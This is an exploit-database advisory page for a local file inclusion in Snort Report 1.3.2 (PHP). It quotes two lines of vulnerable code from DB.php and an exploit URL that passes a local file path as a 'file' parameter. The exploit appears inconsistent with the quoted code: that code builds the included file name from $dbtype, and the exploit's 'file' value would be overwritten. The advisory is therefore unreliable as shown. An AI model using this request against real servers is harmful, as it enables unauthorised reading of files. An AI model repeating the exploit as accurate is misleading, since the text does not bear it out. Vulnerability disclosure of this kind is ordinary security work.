Snort Report 1.3.2 Local File Inclusion

2012.02.07
Credit: T0x!c
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

# Exploit Title: Snort Report Local File Inclusion # Date: 05/02/2012 # Author: T0x!c # Software Link: http://www.symmetrixtech.com/ids/snortreport-1.3.2.tar.gz # Version: <= 1.3.2 # Platform: PHP ########################## -=[ vuln c0de ]=- "/DB.php" 59 $file = join("", array("DB_", $dbtype, ".php")); 60 require($file); ----exploit---- http://server/Path/DB.php?file=[Local File] ##########################

References:

http://www.symmetrixtech.com/ids/snortreport-1.3.2.tar.gz


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top